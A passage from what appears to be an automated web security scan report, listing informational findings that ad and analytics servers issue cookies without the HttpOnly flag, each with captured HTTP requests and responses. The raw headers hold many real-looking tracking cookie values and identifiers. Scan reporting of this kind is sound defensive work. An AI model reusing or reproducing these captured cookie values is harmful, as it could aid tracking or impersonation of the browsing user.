<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
14.169. http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7845/12566/26848-15.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7845/12566/26848-15.html? HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses2=13378^2&12566^1; csi2=3188003.js^1^1317599406^1317599406&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; cd=false; lm="2 Oct 2011 23:50:10 GMT"; csi15=2748761.js^1^1317599431^1317599431&3188004.js^1^1317599406^1317599406&3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688; ses15=13378^2&13209^2&12566^1&12359^1; ses1=13209^3; csi1=3226929.js^1^1317599456^1317599456&3226251.js^2^1317599333^1317599350; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:58:02 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7845/12566; expires=Mon, 03-Oct-2011 00:58:02 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 03-Oct-2011 00:58:02 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13378^2&13209^2&12566^3&12359^1; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=28917; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3188004.js^2^1317599406^1317599882&2748761.js^1^1317599431^1317599431&3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688; expires=Sun, 09-Oct-2011 23:58:02 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1975

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
14.170. http://optimized-by.rubiconproject.com/a/8154/13209/25051-1.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/8154/13209/25051-1.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/8154/13209/25051-1.js?cb=0.5513019266072661&fr=false HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; cd=false; lm="27 Sep 2011 22:12:09 GMT"; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; ruid=154e62c97432177b6a4bcd01^8^1317595852^840399722; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; csi2=3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; ses2=13378^2; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ses15=13378^2; csi15=3209195.js^2^1317595891^1317598688

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:48:53 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=8154/13209; expires=Mon, 03-Oct-2011 00:48:53 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk1=0; expires=Mon, 03-Oct-2011 00:48:53 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses1=13209^2; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=29466; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi1=3226251.js^2^1317599333^1317599333; expires=Sun, 09-Oct-2011 23:48:53 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1423

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3226251"
...[SNIP]...
14.171. http://optimized-by.rubiconproject.com/a/8154/13209/25051-15.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/8154/13209/25051-15.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/8154/13209/25051-15.js?cb=0.1704533719457686&fr=false HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; cd=false; lm="27 Sep 2011 22:12:09 GMT"; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; csi2=3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; ses2=13378^2; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ses15=13378^2; csi15=3209195.js^2^1317595891^1317598688; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk=8154/13209; rdk1=0; ses1=13209^1; csi1=3226251.js^1^1317599333^1317599333

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:49:01 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=8154/13209; expires=Mon, 03-Oct-2011 00:49:01 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 03-Oct-2011 00:49:01 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13378^2&13209^2; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=29458; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3226249.js^2^1317599341^1317599341&3209195.js^2^1317595891^1317598688; expires=Sun, 09-Oct-2011 23:49:01 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1324

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3226249"
...[SNIP]...
14.172. http://optimized-by.rubiconproject.com/a/8154/13209/25051-8.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/8154/13209/25051-8.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/8154/13209/25051-8.js?cb=0.03134333691559732&fr=false HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/SearchResults/?searchQuery=soccor+football+goal+tv+xss&page=2229476&page=2231401&page=2232085&page=2232088&page=2232090&page=2233530&order=date
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses2=13378^2&12566^1; csi2=3188003.js^1^1317599406^1317599406&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; cd=false; lm="2 Oct 2011 23:50:10 GMT"; csi15=2748761.js^1^1317599431^1317599431&3188004.js^1^1317599406^1317599406&3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688; ses15=13378^2&13209^2&12566^1&12359^1; rdk=8154/13209; rdk1=0; ses1=13209^3; csi1=3226929.js^1^1317599456^1317599456&3226251.js^2^1317599333^1317599350

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:53:38 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=8154/13209; expires=Mon, 03-Oct-2011 00:53:38 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk8=0; expires=Mon, 03-Oct-2011 00:53:38 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses8=13209^2; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=29181; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi8=3226247.js^2^1317599462^1317599618; expires=Sun, 09-Oct-2011 23:53:38 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1324

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3226247"
...[SNIP]...
14.173. http://optimized-by.rubiconproject.com/a/dk.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/dk.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/dk.js?defaulting_ad=x29f159.js&size_id=15&account_id=7743&site_id=12359&size=300x250 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses1=13209^2; csi1=3226251.js^2^1317599333^1317599350; ses2=13378^2&12566^1; csi2=3188003.js^1^1317599406^1317599406&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; cd=false; lm="2 Oct 2011 23:50:10 GMT"; rdk=7743/12359; ses15=13378^2&13209^2&12566^1&12359^1; csi15=2748761.js^1^1317599431^1317599431&3188004.js^1^1317599406^1317599406&3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:52:41 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7743/12359; expires=Mon, 03-Oct-2011 00:52:41 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=1; expires=Mon, 03-Oct-2011 00:52:41 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13378^2&13209^2&12566^16cd1be6a76b2fd99d77d4996&12359^10; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=29238; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1426

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3198298"
...[SNIP]...
14.174. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f7564c0bd885b189dd2c0689c8a135b54a03f64809f8cbd50089a11cd86b4411cb50bc864d3c94c6b4cd13ccf4ff4a36690a90955abc09a35b0bbd27175cd4cf1bf3dea9b9b42b9f41f8652aa10714ac52017eb6a6b5781d68ac05c32457c454b1e201a4559ef20b7389d91aca3670ba35bad458bc67c35186546bab3503c81baa26e60457968771f75aeb1ed97f6c46211ed4b6afa3986733d7eead8dd39df3dda8b4113849ffc8cfc68b090813d61e6e0699179b0353640383139a11baa9a5b813f66c1c4af20f146e414ce02607246d79e5a66a17f97765146706192807de971bcc99a9b428b450789021b63b15417261e5ecbb2c01581711ed71d8eacbfd0cda1d529cda7f1cf74dc5500ebe6beaa96988e67fadcfed7a08543cfe72f4b14e79380224c3996114489077da999c7cb5cef5ef569b63e40f171b693c9a985f48514653a2e44c1f0e83bb811c0314f0b5f9499d10f64d4c9f8bad85f708186d05e313cf6d4e7761b05eb87e9e8ee1d8595867f12dd80b8f9f93e183167d502c0a85eb5f881540a5ac8b5dbb9bad2089dba28d794359a7562e262c143f0e67b77fa62cb103811c47616599279878429607438920714938b50f77975f4c5d8fdf9b5bf514d1a01af7b087f7ad7a0aab7ea08cfd2a89746456ddf9091a966f0358e815167f8ef747fbaab6a41fc5526c0ed747519b71c0d1ac90fbc52268b2ee491acfc474d3a81f9a2ea68f5c6d6e7c49bb78c1fef2d52cb62e6263411767c21e131e1b81ca93b5393327d3c01858de3845b58a862c3766d0767141f2acd59ea71476c0852496d2d5747b3544edf81ffd16862fc5b618ffa64acb06a0e1c1f1d657a462a796c282881ca8d914f57dfe16cd9c7379dd57a39f5c9213ea76f3e246b0bc7318c8ea7041e3731d99fc857cf6038000be267e69bfe059dd784240f76ec74eeab584deccfd049156402ab83d7fae6fc4e41d0160292bdf1c3bc4ada51036f24394cbe5d410ce664ca7a4dd9b8926f8d1267a3b4cd6d23b66d608fd61542275652f6c0b590e1a753c67069b48a7fc89012408726216ab142b610b6dc6f805705ccfacea01849a7dce8a19afabed01488c282b19a2582e52f65c5fc189b17e6491c6a2bda98cbf11a67a4e85f4338cae012d02f6b518ace0acd71b6e37a2a1c450940c12a160d7854f110eb1ef6dda0e97a86ce381daa5d65b51fede81f33dd6e98dd3fd8c176602dd4452  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f7564c0bd885b189dd2c0689c8a135b54a03f64809f8cbd50089a11cd86b4411cb50bc864d3c94c6b4cd13ccf4ff4a36690a90955abc09a35b0bbd27175cd4cf1bf3dea9b9b42b9f41f8652aa10714ac52017eb6a6b5781d68ac05c32457c454b1e201a4559ef20b7389d91aca3670ba35bad458bc67c35186546bab3503c81baa26e60457968771f75aeb1ed97f6c46211ed4b6afa3986733d7eead8dd39df3dda8b4113849ffc8cfc68b090813d61e6e0699179b0353640383139a11baa9a5b813f66c1c4af20f146e414ce02607246d79e5a66a17f97765146706192807de971bcc99a9b428b450789021b63b15417261e5ecbb2c01581711ed71d8eacbfd0cda1d529cda7f1cf74dc5500ebe6beaa96988e67fadcfed7a08543cfe72f4b14e79380224c3996114489077da999c7cb5cef5ef569b63e40f171b693c9a985f48514653a2e44c1f0e83bb811c0314f0b5f9499d10f64d4c9f8bad85f708186d05e313cf6d4e7761b05eb87e9e8ee1d8595867f12dd80b8f9f93e183167d502c0a85eb5f881540a5ac8b5dbb9bad2089dba28d794359a7562e262c143f0e67b77fa62cb103811c47616599279878429607438920714938b50f77975f4c5d8fdf9b5bf514d1a01af7b087f7ad7a0aab7ea08cfd2a89746456ddf9091a966f0358e815167f8ef747fbaab6a41fc5526c0ed747519b71c0d1ac90fbc52268b2ee491acfc474d3a81f9a2ea68f5c6d6e7c49bb78c1fef2d52cb62e6263411767c21e131e1b81ca93b5393327d3c01858de3845b58a862c3766d0767141f2acd59ea71476c0852496d2d5747b3544edf81ffd16862fc5b618ffa64acb06a0e1c1f1d657a462a796c282881ca8d914f57dfe16cd9c7379dd57a39f5c9213ea76f3e246b0bc7318c8ea7041e3731d99fc857cf6038000be267e69bfe059dd784240f76ec74eeab584deccfd049156402ab83d7fae6fc4e41d0160292bdf1c3bc4ada51036f24394cbe5d410ce664ca7a4dd9b8926f8d1267a3b4cd6d23b66d608fd61542275652f6c0b590e1a753c67069b48a7fc89012408726216ab142b610b6dc6f805705ccfacea01849a7dce8a19afabed01488c282b19a2582e52f65c5fc189b17e6491c6a2bda98cbf11a67a4e85f4338cae012d02f6b518ace0acd71b6e37a2a1c450940c12a160d7854f110eb1ef6dda0e97a86ce381daa5d65b51fede81f33dd6e98dd3fd8c176602dd4452

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f7564c0bd885b189dd2c0689c8a135b54a03f64809f8cbd50089a11cd86b4411cb50bc864d3c94c6b4cd13ccf4ff4a36690a90955abc09a35b0bbd27175cd4cf1bf3dea9b9b42b9f41f8652aa10714ac52017eb6a6b5781d68ac05c32457c454b1e201a4559ef20b7389d91aca3670ba35bad458bc67c35186546bab3503c81baa26e60457968771f75aeb1ed97f6c46211ed4b6afa3986733d7eead8dd39df3dda8b4113849ffc8cfc68b090813d61e6e0699179b0353640383139a11baa9a5b813f66c1c4af20f146e414ce02607246d79e5a66a17f97765146706192807de971bcc99a9b428b450789021b63b15417261e5ecbb2c01581711ed71d8eacbfd0cda1d529cda7f1cf74dc5500ebe6beaa96988e67fadcfed7a08543cfe72f4b14e79380224c3996114489077da999c7cb5cef5ef569b63e40f171b693c9a985f48514653a2e44c1f0e83bb811c0314f0b5f9499d10f64d4c9f8bad85f708186d05e313cf6d4e7761b05eb87e9e8ee1d8595867f12dd80b8f9f93e183167d502c0a85eb5f881540a5ac8b5dbb9bad2089dba28d794359a7562e262c143f0e67b77fa62cb103811c47616599279878429607438920714938b50f77975f4c5d8fdf9b5bf514d1a01af7b087f7ad7a0aab7ea08cfd2a89746456ddf9091a966f0358e815167f8ef747fbaab6a41fc5526c0ed747519b71c0d1ac90fbc52268b2ee491acfc474d3a81f9a2ea68f5c6d6e7c49bb78c1fef2d52cb62e6263411767c21e131e1b81ca93b5393327d3c01858de3845b58a862c3766d0767141f2acd59ea71476c0852496d2d5747b3544edf81ffd16862fc5b618ffa64acb06a0e1c1f1d657a462a796c282881ca8d914f57dfe16cd9c7379dd57a39f5c9213ea76f3e246b0bc7318c8ea7041e3731d99fc857cf6038000be267e69bfe059dd784240f76ec74eeab584deccfd049156402ab83d7fae6fc4e41d0160292b